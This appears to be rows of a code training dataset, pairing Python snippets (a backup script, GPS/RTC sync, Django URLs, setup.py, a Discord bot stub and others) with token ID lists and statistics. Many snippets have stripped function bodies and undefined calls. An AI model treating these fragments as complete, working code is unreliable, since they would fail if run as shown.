30604,
13,
7295,
13,
27530,
1330,
31433,
18124,
198,
6738,
5254,
13,
37540,
1330,
6208,
14881,
628,
198
] | 4.183099 | 71 |
from auror_core.v2.params import Params
class {{cookiecutter.project_name}}(Params):
pass | [
6738,
45714,
273,
62,
7295,
13,
85,
17,
13,
37266,
1330,
2547,
4105,
198,
198,
4871,
22935,
44453,
8968,
353,
13,
16302,
62,
3672,
11709,
7,
10044,
4105,
2599,
198,
220,
220,
220,
1208
] | 2.764706 | 34 |
import sys, getopt
from os import path
import time
from configure import Configure
from scanner import FoundFile, Scanner
from checker import Checker
from taker import Taker
print("** Welcome to MyWayback! **")
args = sys.argv[1:]
if len(args) == 0:
print("ERROR: Missing command-line argument!")
exit(0)
targetbasedir = args[0]
print("Target directory: {}".format(targetbasedir))
snapshotname = time.strftime("%Y-%m-%d--%H-%M")
print("Snaphost name: {}".format(snapshotname))
cfg = Configure()
cfg.read_configdir(path.join(targetbasedir, 'config'))
print("Scan dirs (+):")
print(cfg.scandirs)
print("Skip dirs (-):")
print(cfg.skipdirs)
sca = Scanner()
#s.scan_dirtree('/home/jara/Dokumenty')
sca.scan_confdirs(cfg)
print()
print("SCANNER FINISHED: Number of found files: {}".format(sca.num_foundfiles))
print()
# for i in range(0, 10):
# ff = s.foundfiles.pop()
# print(ff.order, ff.fullname())
che = Checker(targetbasedir)
tak = Taker(targetbasedir, snapshotname)
batchsize = 1000
while sca.foundfiles or che.digestedfiles:
che.digest_files(sca, batchsize)
tak.take_files(che, batchsize)
print("** Finished a backup run with MyWayback! **")
| [
11748,
25064,
11,
651,
8738,
198,
6738,
28686,
1330,
3108,
198,
11748,
640,
198,
6738,
17425,
1330,
17056,
495,
198,
6738,
27474,
1330,
4062,
8979,
11,
20937,
1008,
198,
6738,
2198,
263,
1330,
6822,
263,
198,
6738,
256,
3110,
1330,
309,
3110,
198,
198,
4798,
7203,
1174,
19134,
284,
2011,
25309,
1891,
0,
12429,
4943,
628,
198,
22046,
796,
25064,
13,
853,
85,
58,
16,
47715,
198,
198,
361,
18896,
7,
22046,
8,
6624,
657,
25,
198,
197,
4798,
7203,
24908,
25,
25639,
3141,
12,
1370,
4578,
2474,
8,
198,
197,
37023,
7,
15,
8,
198,
198,
16793,
3106,
343,
796,
26498,
58,
15,
60,
198,
4798,
7203,
21745,
8619,
25,
23884,
1911,
18982,
7,
16793,
3106,
343,
4008,
198,
45380,
9442,
3672,
796,
640,
13,
2536,
31387,
7203,
4,
56,
12,
4,
76,
12,
4,
67,
438,
4,
39,
12,
4,
44,
4943,
198,
4798,
7203,
43826,
4774,
1438,
25,
23884,
1911,
18982,
7,
45380,
9442,
3672,
4008,
198,
198,
37581,
796,
17056,
495,
3419,
198,
37581,
13,
961,
62,
11250,
15908,
7,
6978,
13,
22179,
7,
16793,
3106,
343,
11,
705,
11250,
6,
4008,
198,
4798,
7203,
33351,
288,
17062,
11502,
2599,
4943,
198,
4798,
7,
37581,
13,
1416,
392,
17062,
8,
198,
4798,
7203,
50232,
288,
17062,
13841,
2599,
4943,
198,
4798,
7,
37581,
13,
48267,
15908,
82,
8,
628,
198,
1416,
64,
796,
20937,
1008,
3419,
198,
2,
82,
13,
35836,
62,
67,
2265,
631,
10786,
14,
11195,
14,
73,
3301,
14,
35,
482,
1713,
88,
11537,
198,
1416,
64,
13,
35836,
62,
10414,
15908,
82,
7,
37581,
8,
198,
4798,
3419,
198,
4798,
7203,
6173,
1565,
21479,
33642,
18422,
1961,
25,
7913,
286,
1043,
3696,
25,
23884,
1911,
18982,
7,
1416,
64,
13,
22510,
62,
9275,
16624,
4008,
198,
4798,
3419,
198,
198,
2,
329,
1312,
287,
2837,
7,
15,
11,
838,
2599,
198,
2,
220,
197,
487,
796,
264,
13,
9275,
16624,
13,
12924,
3419,
198,
2,
220,
197,
4798,
7,
487,
13,
2875,
11,
31246,
13,
12853,
3672,
28955,
198,
198,
2395,
796,
6822,
263,
7,
16793,
3106,
343,
8,
198,
83,
461,
796,
309,
3110,
7,
16793,
3106,
343,
11,
27479,
3672,
8,
198,
43501,
7857,
796,
8576,
198,
198,
4514,
629,
64,
13,
9275,
16624,
393,
1125,
13,
12894,
7287,
16624,
25,
198,
197,
2395,
13,
12894,
395,
62,
16624,
7,
1416,
64,
11,
15458,
7857,
8,
198,
197,
83,
461,
13,
20657,
62,
16624,
7,
2395,
11,
15458,
7857,
8,
198,
198,
4798,
7203,
1174,
42931,
257,
11559,
1057,
351,
2011,
25309,
1891,
0,
12429,
4943,
198
] | 2.721311 | 427 |
"""This module contains file carving scenario related classes and functions."""
from multimethod import multimethod
import woodblock.fragments
class Scenario(list):
"""This class represents a file carving scenario.
A scenario contains fragments in a certain order.
Args:
name: The name of the scenario.
"""
@multimethod
def add(self, fragment: woodblock.fragments.FillerFragment):
"""Add a filler fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragment: woodblock.fragments.FileFragment): # pylint: disable=function-redefined
"""Add a file fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragments: list): # pylint: disable=function-redefined
"""Add a list of fragments to the scenario.
Args:
fragments: The list of fragments to be added.
"""
self._add_from_iterable(fragments)
@multimethod
def add(self, fragments: tuple): # pylint: disable=function-redefined
"""Add a tuple of fragments to the scenario.
Args:
fragments: The tuple of fragments to be added.
"""
self._add_from_iterable(fragments)
@property
def metadata(self) -> dict:
"""Return the scenario metadata."""
meta = {'name': self.name, 'files': list()}
files = dict()
for frag in self:
frag_meta = frag.metadata
file_id = frag_meta['file']['id']
if file_id not in files:
files[file_id] = {'original': frag_meta['file'], 'fragments': list()}
files[file_id]['fragments'].append(frag_meta['fragment'])
meta['files'] = list(files.values())
self._sort_fragments_by_number(meta)
return meta
@staticmethod
| [
37811,
1212,
8265,
4909,
2393,
39510,
8883,
3519,
6097,
290,
5499,
526,
15931,
198,
198,
6738,
1963,
38813,
2065,
1330,
1963,
38813,
2065,
198,
198,
11748,
4898,
9967,
13,
8310,
363,
902,
628,
198,
4871,
1446,
39055,
7,
4868,
2599,
198,
220,
220,
220,
37227,
1212,
1398,
6870,
257,
2393,
39510,
8883,
13,
628,
220,
220,
220,
317,
8883,
4909,
21441,
287,
257,
1728,
1502,
13,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1438,
25,
383,
1438,
286,
262,
8883,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
2488,
16680,
38813,
2065,
198,
220,
220,
220,
825,
751,
7,
944,
11,
24225,
25,
4898,
9967,
13,
8310,
363,
902,
13,
37,
4665,
42974,
434,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
4550,
257,
41134,
24225,
284,
262,
8883,
13,
628,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24225,
25,
383,
24225,
284,
307,
2087,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
33295,
7,
8310,
363,
434,
8,
628,
220,
220,
220,
2488,
16680,
38813,
2065,
198,
220,
220,
220,
825,
751,
7,
944,
11,
24225,
25,
4898,
9967,
13,
8310,
363,
902,
13,
8979,
42974,
434,
2599,
220,
1303,
279,
2645,
600,
25,
15560,
28,
8818,
12,
445,
18156,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
4550,
257,
2393,
24225,
284,
262,
8883,
13,
628,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24225,
25,
383,
24225,
284,
307,
2087,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
33295,
7,
8310,
363,
434,
8,
628,
220,
220,
220,
2488,
16680,
38813,
2065,
198,
220,
220,
220,
825,
751,
7,
944,
11,
21441,
25,
1351,
2599,
220,
1303,
279,
2645,
600,
25,
15560,
28,
8818,
12,
445,
18156,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
4550,
257,
1351,
286,
21441,
284,
262,
8883,
13,
628,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
21441,
25,
383,
1351,
286,
21441,
284,
307,
2087,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
2860,
62,
6738,
62,
2676,
540,
7,
8310,
363,
902,
8,
628,
220,
220,
220,
2488,
16680,
38813,
2065,
198,
220,
220,
220,
825,
751,
7,
944,
11,
21441,
25,
46545,
2599,
220,
1303,
279,
2645,
600,
25,
15560,
28,
8818,
12,
445,
18156,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
4550,
257,
46545,
286,
21441,
284,
262,
8883,
13,
628,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
21441,
25,
383,
46545,
286,
21441,
284,
307,
2087,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
2860,
62,
6738,
62,
2676,
540,
7,
8310,
363,
902,
8,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
20150,
7,
944,
8,
4613,
8633,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
262,
8883,
20150,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
13634,
796,
1391,
6,
3672,
10354,
2116,
13,
3672,
11,
705,
16624,
10354,
1351,
3419,
92,
198,
220,
220,
220,
220,
220,
220,
220,
3696,
796,
8633,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
329,
7956,
287,
2116,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7956,
62,
28961,
796,
7956,
13,
38993,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2393,
62,
312,
796,
7956,
62,
28961,
17816,
7753,
6,
7131,
6,
312,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2393,
62,
312,
407,
287,
3696,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3696,
58,
7753,
62,
312,
60,
796,
1391,
6,
14986,
10354,
7956,
62,
28961,
17816,
7753,
6,
4357,
705,
8310,
363,
902,
10354,
1351,
3419,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3696,
58,
7753,
62,
312,
7131,
6,
8310,
363,
902,
6,
4083,
33295,
7,
8310,
363,
62,
28961,
17816,
8310,
363,
434,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
13634,
17816,
16624,
20520,
796,
1351,
7,
16624,
13,
27160,
28955,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
30619,
62,
8310,
363,
902,
62,
1525,
62,
17618,
7,
28961,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
13634,
628,
220,
220,
220,
2488,
12708,
24396,
198
] | 2.414545 | 825 |
from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registro/', views.registro, name='registro'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('minhas_reservas/', views.minhas_reservas, name='minhas_reservas'),
path('ser_anfitriao/', views.ser_anfitriao, name='ser_anfitriao'),
] | [
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
6738,
764,
1330,
5009,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
1330,
5009,
355,
6284,
62,
33571,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
3108,
10786,
2301,
396,
305,
14,
3256,
5009,
13,
2301,
396,
305,
11,
1438,
11639,
2301,
396,
305,
33809,
198,
220,
220,
220,
3108,
10786,
38235,
14,
3256,
6284,
62,
33571,
13,
47790,
7680,
13,
292,
62,
1177,
7,
28243,
62,
3672,
11639,
18417,
14,
38235,
13,
6494,
33809,
1438,
11639,
38235,
33809,
198,
220,
220,
220,
3108,
10786,
6404,
448,
14,
3256,
6284,
62,
33571,
13,
11187,
448,
7680,
13,
292,
62,
1177,
22784,
1438,
11639,
6404,
448,
33809,
198,
220,
220,
220,
3108,
10786,
1084,
10134,
62,
411,
712,
292,
14,
3256,
5009,
13,
1084,
10134,
62,
411,
712,
292,
11,
1438,
11639,
1084,
10134,
62,
411,
712,
292,
33809,
198,
220,
220,
220,
3108,
10786,
2655,
62,
272,
11147,
380,
5488,
14,
3256,
5009,
13,
2655,
62,
272,
11147,
380,
5488,
11,
1438,
11639,
2655,
62,
272,
11147,
380,
5488,
33809,
198,
60
] | 2.648649 | 185 |
from setuptools import setup
import re
APP_NAME = 'ptlearn'
VERSION = '0.1'
if __name__ == '__main__':
check_version()
setup(
name=APP_NAME,
version=VERSION,
description='A Python machine learing library, based on PyTorch',
long_description=readme(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
],
url='https://github.com/SYAN83/pytorch-learn',
author='Shu Yan',
author_email='[email protected]',
license='MIT',
packages=setuptools.find_packages(exclude=['tests']),
install_requires=[
'torch>=1.0.0',
],
include_package_data=True,
zip_safe=False
)
| [
6738,
900,
37623,
10141,
1330,
9058,
198,
11748,
302,
628,
198,
24805,
62,
20608,
796,
705,
457,
35720,
6,
198,
43717,
796,
705,
15,
13,
16,
6,
628,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
2198,
62,
9641,
3419,
628,
220,
220,
220,
9058,
7,
198,
220,
220,
220,
220,
220,
220,
220,
1438,
28,
24805,
62,
20608,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2196,
28,
43717,
11,
198,
220,
220,
220,
220,
220,
220,
220,
6764,
11639,
32,
11361,
4572,
443,
1723,
5888,
11,
1912,
319,
9485,
15884,
354,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
890,
62,
11213,
28,
961,
1326,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
1398,
13350,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
41206,
12678,
7904,
362,
532,
3771,
12,
38077,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
5317,
1631,
7591,
1240,
7904,
7868,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
5317,
1631,
7591,
1240,
7904,
5800,
14,
25104,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
34156,
7904,
7294,
40,
20010,
1079,
7904,
17168,
13789,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
18843,
803,
4482,
7904,
4100,
2640,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
18843,
803,
4482,
7904,
28069,
10426,
7904,
7020,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
21,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
33221,
7904,
10442,
7712,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
33221,
7904,
22060,
14,
13798,
1586,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
220,
220,
19016,
11639,
5450,
1378,
12567,
13,
785,
14,
23060,
1565,
5999,
14,
9078,
13165,
354,
12,
35720,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
1772,
11639,
2484,
84,
10642,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
1772,
62,
12888,
11639,
88,
504,
13415,
13,
16241,
31,
14816,
13,
785,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
5964,
11639,
36393,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
10392,
28,
2617,
37623,
10141,
13,
19796,
62,
43789,
7,
1069,
9152,
28,
17816,
41989,
20520,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2721,
62,
47911,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
13165,
354,
29,
28,
16,
13,
15,
13,
15,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
220,
220,
2291,
62,
26495,
62,
7890,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
19974,
62,
21230,
28,
25101,
198,
220,
220,
220,
1267,
198
] | 2.197628 | 506 |
#!/usr/bin/python
# Task to maintain system RTC aligned with GPS time, coming from a
# Teltonka RUT955 terminal.
import socket
import sys
import time
import os
import logging
import logging.handlers
if __name__ == "__main__":
logger = logging.getLogger('GPS_Task')
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
"/mnt/logs/gps.log", maxBytes=1024*1024, backupCount=5)
logger.addHandler(handler)
logger.info(logString("*** Starting execution"))
oldTimeStamp = 0.0
isFirst = True
myOwnIP = getIP()
logger.info(logString("This station's inferred IP: %s" % myOwnIP))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.info(logString("Socket allocated"))
try:
sock.bind((myOwnIP, 17050))
logger.info(logString("Socket opened on port 17050 (check on Teltonika if same)"))
except Exception as e:
logger.error(logString("*** Terminating execution - Error: socket not opened: %s", str(e)))
sys.exit(1)
while True:
# Get status from /mnt/ramdisk/gps.dat
state = getState()
# Act, based on state
if state == 1: # Active
# Get most recent data from GPS pool
(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed) = getGpsData(sock, '192.162.1.1', 17050)
(rTimeStamp, iPriority, rLon, rLat, iHgt, iAng, iSat, iSpeed) = getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
logger.info(logString("Last GPS fix: %f %f %f" % (rLat, rLon, iHgt)))
now = time.time()
deltaTime = abs(now - rTimeStamp)
if deltaTime > 10:
timeAlarm = "***"
setRTC(rTimeStamp)
logger.info(logString("RTC updated to GPS"))
else:
timeAlarm = ""
# Write GPS status data
f = open("/mnt/ramdisk/gps_state.txt", "w")
f.write("Time delta (RTC - GPS): %f %s\n" % (now - rTimeStamp, timeAlarm))
f.write("Lat, Lon: %f, %f\n" % (rLat, rLon))
f.write("Altitude: %d\n" % iHgt)
f.write("Angle: %d\n" % iAng)
f.write("Speed: %d\n" % iSpeed)
f.write("Satellites: %d\n" % iSat)
f.write("Message priority: %d\n" % iPriority)
f.close()
# Write positional data in computer-friendly form
f = open("/mnt/ramdisk/Position.csv", "w")
f.write("%f, %f, %d\n" % (rLat, rLon, iHgt))
f.close()
if isFirst:
isFirst = False
else:
if deltaTime > 60.0:
# No GPS updates ever since: force modem reboot....
logger.warning(logString("GPS is apparently blocked"))
isFirst = True
oldTimeStamp = 0.0
else:
oldTimeStamp = rTimeStamp
else: # Waiting: do nothing but waiting a little bit
time.sleep()
logger.info(logString("*** Terminating execution"))
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
2,
15941,
284,
5529,
1080,
371,
4825,
19874,
351,
15472,
640,
11,
2406,
422,
257,
198,
2,
12088,
1122,
4914,
371,
3843,
24,
2816,
12094,
13,
198,
198,
11748,
17802,
198,
11748,
25064,
198,
11748,
640,
198,
11748,
28686,
198,
11748,
18931,
198,
11748,
18931,
13,
4993,
8116,
628,
197,
198,
197,
198,
197,
198,
197,
198,
197,
198,
197,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
197,
198,
197,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
10786,
38,
3705,
62,
25714,
11537,
198,
197,
6404,
1362,
13,
2617,
4971,
7,
6404,
2667,
13,
30531,
8,
198,
197,
30281,
796,
18931,
13,
4993,
8116,
13,
24864,
803,
8979,
25060,
7,
198,
197,
197,
197,
220,
12813,
76,
429,
14,
6404,
82,
14,
70,
862,
13,
6404,
1600,
3509,
45992,
28,
35500,
9,
35500,
11,
11559,
12332,
28,
20,
8,
198,
197,
6404,
1362,
13,
2860,
25060,
7,
30281,
8,
198,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
8162,
17962,
9706,
48774,
628,
197,
727,
7575,
1273,
696,
796,
657,
13,
15,
198,
197,
271,
5962,
796,
6407,
198,
197,
198,
197,
1820,
23858,
4061,
796,
651,
4061,
3419,
198,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
1212,
4429,
338,
41240,
6101,
25,
4064,
82,
1,
4064,
616,
23858,
4061,
4008,
628,
197,
82,
735,
796,
17802,
13,
44971,
7,
44971,
13,
8579,
62,
1268,
2767,
11,
17802,
13,
50,
11290,
62,
35,
10761,
2390,
8,
198,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
39105,
19171,
48774,
198,
197,
28311,
25,
198,
197,
197,
82,
735,
13,
21653,
19510,
1820,
23858,
4061,
11,
16677,
1120,
4008,
198,
197,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
39105,
4721,
319,
2493,
16677,
1120,
357,
9122,
319,
12088,
1122,
9232,
611,
976,
16725,
4008,
198,
197,
16341,
35528,
355,
304,
25,
198,
197,
197,
6404,
1362,
13,
18224,
7,
6404,
10100,
7203,
8162,
15527,
803,
9706,
532,
13047,
25,
17802,
407,
4721,
25,
4064,
82,
1600,
965,
7,
68,
22305,
198,
197,
197,
17597,
13,
37023,
7,
16,
8,
628,
197,
4514,
6407,
25,
198,
197,
197,
198,
197,
197,
2,
3497,
3722,
422,
1220,
76,
429,
14,
859,
39531,
14,
70,
862,
13,
19608,
198,
197,
197,
5219,
796,
651,
9012,
3419,
198,
197,
197,
198,
197,
197,
2,
2191,
11,
1912,
319,
1181,
198,
197,
197,
361,
1181,
6624,
352,
25,
197,
2,
14199,
198,
197,
197,
198,
197,
197,
197,
2,
3497,
749,
2274,
1366,
422,
15472,
5933,
198,
197,
197,
197,
7,
81,
85,
7575,
1273,
696,
11,
21628,
22442,
414,
11,
374,
85,
43,
261,
11,
374,
85,
24220,
11,
21628,
39,
13655,
11,
21628,
13450,
11,
21628,
20245,
11,
21628,
22785,
8,
796,
651,
38,
862,
6601,
7,
82,
735,
11,
705,
17477,
13,
25061,
13,
16,
13,
16,
3256,
16677,
1120,
8,
198,
197,
197,
197,
7,
81,
7575,
1273,
696,
11,
9736,
7701,
414,
11,
374,
43,
261,
11,
374,
24220,
11,
1312,
39,
13655,
11,
1312,
13450,
11,
1312,
20245,
11,
1312,
22785,
8,
796,
651,
6943,
26446,
38,
862,
13949,
7,
81,
85,
7575,
1273,
696,
11,
21628,
22442,
414,
11,
374,
85,
43,
261,
11,
374,
85,
24220,
11,
21628,
39,
13655,
11,
21628,
13450,
11,
21628,
20245,
11,
21628,
22785,
8,
198,
197,
197,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
5956,
15472,
4259,
25,
4064,
69,
4064,
69,
4064,
69,
1,
4064,
357,
81,
24220,
11,
374,
43,
261,
11,
1312,
39,
13655,
22305,
198,
197,
197,
198,
197,
197,
197,
2197,
796,
640,
13,
2435,
3419,
198,
197,
197,
197,
67,
12514,
7575,
796,
2352,
7,
2197,
532,
374,
7575,
1273,
696,
8,
198,
197,
197,
197,
361,
25979,
7575,
1875,
838,
25,
198,
197,
197,
197,
197,
2435,
2348,
1670,
796,
366,
8162,
1,
198,
197,
197,
197,
197,
2617,
49,
4825,
7,
81,
7575,
1273,
696,
8,
198,
197,
197,
197,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
49,
4825,
6153,
284,
15472,
48774,
198,
197,
197,
197,
17772,
25,
198,
197,
197,
197,
197,
2435,
2348,
1670,
796,
13538,
198,
197,
197,
197,
198,
197,
197,
197,
2,
19430,
15472,
3722,
1366,
198,
197,
197,
197,
69,
796,
1280,
7203,
14,
76,
429,
14,
859,
39531,
14,
70,
862,
62,
5219,
13,
14116,
1600,
366,
86,
4943,
198,
197,
197,
197,
69,
13,
13564,
7203,
7575,
25979,
357,
49,
4825,
532,
15472,
2599,
4064,
69,
4064,
82,
59,
77,
1,
4064,
357,
2197,
532,
374,
7575,
1273,
696,
11,
640,
2348,
1670,
4008,
198,
197,
197,
197,
69,
13,
13564,
7203,
24220,
11,
39295,
25,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4064,
69,
11,
4064,
69,
59,
77,
1,
4064,
357,
81,
24220,
11,
374,
43,
261,
4008,
198,
197,
197,
197,
69,
13,
13564,
7203,
29161,
3984,
25,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4064,
67,
59,
77,
1,
4064,
1312,
39,
13655,
8,
198,
197,
197,
197,
69,
13,
13564,
7203,
13450,
293,
25,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4064,
67,
59,
77,
1,
4064,
1312,
13450,
8,
198,
197,
197,
197,
69,
13,
13564,
7203,
22785,
25,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4064,
67,
59,
77,
1,
4064,
1312,
22785,
8,
198,
197,
197,
197,
69,
13,
13564,
7203,
50,
7528,
2737,
25,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4064,
67,
59,
77,
1,
4064,
1312,
20245,
8,
198,
197,
197,
197,
69,
13,
13564,
7203,
12837,
8475,
25,
220,
220,
220,
220,
220,
220,
4064,
67,
59,
77,
1,
4064,
9736,
7701,
414,
8,
198,
197,
197,
197,
69,
13,
19836,
3419,
198,
197,
197,
197,
198,
197,
197,
197,
2,
19430,
45203,
1366,
287,
3644,
12,
13120,
1296,
198,
197,
197,
197,
69,
796,
1280,
7203,
14,
76,
429,
14,
859,
39531,
14,
26545,
13,
40664,
1600,
366,
86,
4943,
198,
197,
197,
197,
69,
13,
13564,
7203,
4,
69,
11,
4064,
69,
11,
4064,
67,
59,
77,
1,
4064,
357,
81,
24220,
11,
374,
43,
261,
11,
1312,
39,
13655,
4008,
198,
197,
197,
197,
69,
13,
19836,
3419,
198,
197,
197,
197,
198,
197,
197,
197,
361,
318,
5962,
25,
198,
197,
197,
197,
197,
198,
197,
197,
197,
197,
271,
5962,
796,
10352,
198,
197,
197,
197,
198,
197,
197,
197,
17772,
25,
198,
197,
197,
197,
197,
198,
197,
197,
197,
197,
361,
25979,
7575,
1875,
3126,
13,
15,
25,
198,
197,
197,
197,
197,
197,
198,
197,
197,
197,
197,
197,
2,
1400,
15472,
5992,
1683,
1201,
25,
2700,
38053,
20149,
1106,
198,
197,
197,
197,
197,
197,
6404,
1362,
13,
43917,
7,
6404,
10100,
7203,
38,
3705,
318,
5729,
10226,
48774,
198,
197,
197,
197,
197,
197,
198,
197,
197,
197,
197,
197,
271,
5962,
796,
6407,
198,
197,
197,
197,
197,
197,
727,
7575,
1273,
696,
796,
657,
13,
15,
198,
197,
197,
197,
197,
197,
198,
197,
197,
197,
197,
17772,
25,
198,
197,
197,
197,
197,
197,
198,
197,
197,
197,
197,
197,
727,
7575,
1273,
696,
796,
374,
7575,
1273,
696,
198,
197,
197,
197,
197,
197,
198,
197,
197,
17772,
25,
1303,
39669,
25,
466,
2147,
475,
4953,
257,
1310,
1643,
198,
197,
197,
197,
198,
197,
197,
197,
2435,
13,
42832,
3419,
628,
197,
6404,
1362,
13,
10951,
7,
6404,
10100,
7203,
8162,
15527,
803,
9706,
48774,
198
] | 2.192037 | 1,281 |
import discord
from discord.ext import commands, tasks
import asyncio
import time
import datetime
import json
import aiohttp
import os
from discord import Webhook, AsyncWebhookAdapter
client = commands.AutoShardedBot(command_prefix=".")
Client = discord.Client()
client.remove_command('help')
with open("adat.json") as f:
adat = json.load(f)
@client.event
@client.command()
@tasks.loop(minutes=5)
@client.command()
client.run("TOKEN")
| [
11748,
36446,
198,
6738,
36446,
13,
2302,
1330,
9729,
11,
8861,
198,
11748,
30351,
952,
198,
11748,
640,
198,
11748,
4818,
8079,
198,
11748,
33918,
198,
11748,
257,
952,
4023,
198,
11748,
28686,
198,
6738,
36446,
1330,
5313,
25480,
11,
1081,
13361,
13908,
25480,
47307,
198,
198,
16366,
796,
9729,
13,
27722,
2484,
10676,
20630,
7,
21812,
62,
40290,
2625,
19570,
198,
11792,
796,
36446,
13,
11792,
3419,
198,
16366,
13,
28956,
62,
21812,
10786,
16794,
11537,
198,
198,
4480,
1280,
7203,
324,
265,
13,
17752,
4943,
355,
277,
25,
198,
220,
220,
220,
512,
265,
796,
33918,
13,
2220,
7,
69,
8,
198,
198,
31,
16366,
13,
15596,
198,
198,
31,
16366,
13,
21812,
3419,
198,
198,
31,
83,
6791,
13,
26268,
7,
1084,
1769,
28,
20,
8,
198,
198,
31,
16366,
13,
21812,
3419,
198,
198,
16366,
13,
5143,
7203,
10468,
43959,
4943,
198
] | 3.054795 | 146 |
# coding: utf-8
# Manticore Search Client
# Copyright (c) 2020-2021, Manticore Software LTD (https://manticoresearch.com)
#
# All rights reserved
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
